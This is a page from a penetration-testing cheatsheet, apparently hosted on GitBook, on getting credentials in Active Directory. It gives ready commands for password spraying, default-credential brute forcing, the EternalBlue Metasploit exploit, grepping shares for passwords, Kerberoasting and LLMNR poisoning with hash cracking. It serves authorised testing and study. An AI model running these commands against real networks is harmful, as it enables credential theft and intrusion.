Cheatsheet
  • Pentest
    • Reconnaissance
    • Network Scanning and Enumeration
    • Active Directory
      • Enumeration
      • Getting Credentials
      • Lateral Movement
      • Privilege Escalation
Powered by GitBook
On this page
  1. Pentest
  2. Active Directory

Getting Credentials

PreviousEnumerationNextLateral Movement

Last updated 6 months ago

  1. Password Spraying Description: Attempt a single password across multiple user accounts to avoid account lockout. Tools/Commands:

    • CrackMapExec: crackmapexec smb <IP> -u users.txt -p "Password123"

    • Hydra: hydra -L users.txt -p "Password123" smb://<IP>

    • Metasploit: auxiliary/scanner/smb/smb_login

  2. Default Passwords (Tomcat, Jenkins, etc.) Description: Check for default or weak credentials on services or applications. Tools/Commands:

    • nmap --script http-default-accounts -p <port> <IP>

    • hydra -l admin -P passwords.txt http-get://<IP>

    • Online default password repositories (e.g., )

  3. Missing Patches Description: Identify and exploit unpatched vulnerabilities in services or systems. Tools/Commands:

    • Nessus/Qualys for vulnerability scanning.

    • Metasploit: use exploit/windows/smb/ms17_010_eternalblue

    • nmap --script vuln <IP>

  4. Cleartext Passwords on File Shares Description: Look for files on shared folders containing plaintext credentials. Tools/Commands:

    • PowerShell: Get-ChildItem \\<IP>\share -Recurse | Select-String -Pattern "password"

    • SMBClient: smbclient //<IP>/<share> -U <username>

    • CrackMapExec: crackmapexec smb <IP> -u <USER> -p <PASS> --shares

  5. Kerberoasting Description: Request service tickets for SPNs and crack them offline to recover passwords. Tools/Commands:

    • Impacket: GetUserSPNs.py -request -dc-ip <IP> <DOMAIN>/<USER>

    • Rubeus: Rubeus.exe kerberoast

    • John the Ripper: john --format=krb5tgs hash.txt

  6. LLMNR and NetBIOS Poisoning Description: Exploit LLMNR/NetBIOS to capture and relay NTLMv2 hashes. Tools/Commands:

    • Responder: responder -I <interface>

    • Inveigh: Invoke-Inveigh

    • Hashcat: hashcat -m 5600 hash.txt wordlist.txt

default creds GitHub